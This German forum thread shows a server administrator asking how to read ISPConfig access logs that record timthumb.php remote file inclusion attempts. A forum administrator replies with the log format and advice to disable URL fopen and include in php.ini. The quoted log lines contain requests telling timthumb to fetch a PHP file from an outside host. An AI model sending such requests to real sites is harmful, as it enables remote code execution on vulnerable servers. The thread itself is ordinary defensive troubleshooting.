Remote File Inlusion - Angriffe von meinem Server

Dieses Thema im Forum "Allgemein" wurde erstellt von Feanwulf, 20. Jan. 2012.

  1. Feanwulf

    Feanwulf Member

    Hallo,

    anscheinend wird über meinen Server ab und zu) seit wenigen Tagen (also seit gestern) ein Remote File Intrusion auf anderen Serverv versucht.

    In den Logfiles finde ich:

    web-ng:/var/log/httpd# grep taxo /var/log/httpd/ispconfig_access_log_2012_01_19
    localhost||||1229||||78.46.75.84 - - [19/Jan/2012:23:18:41 +0100] "GET /?q=taxonomy/term/4//wp-content/themes/manifesto/scripts//timthumb.php%3fsrc=http://img.youtube.com.ericharland.net/bogel.php HTTP/1.1" 200 1229 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"

    localhost||||1229||||78.46.75.84 - - [19/Jan/2012:23:18:43 +0100] "GET /?q=taxonomy/term//wp-content/themes/manifesto/scripts//timthumb.php%3fsrc=http://img.youtube.com.ericharland.net/bogel.php HTTP/1.1" 200 1229 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"

    Ich benutze ISPConfig 2 (daher der Pfad zu der Logdatei)

    Kann mir jemand erklären wie ich:

    localhost||||1229||||78.46.75.84

    deuten muss

    also localhost scheint klar - dahinter die IP Adresse meines Servers
    Aber die Zahl dazwischen kann ich nicht zuordnen!
     
  2. Till

    Till Administrator

    Schau mal in die php.ini Datei, es sollte URL Fopen und URL Include ausgeschaltet sein.

    Das ist die Größe der heruntergeladenen Daten in Bytes und wird zur Erstellung der Trafficstatistik verwendet.
     
  3. Feanwulf

    Feanwulf Member

    Allow_url_fopen hab ich auf off (das hatte ich beim googlen gefunden)
    aber include muss ich nachher schauen (das war mir nicht bekannt)

    DANKE
     

Diese Seite empfehlen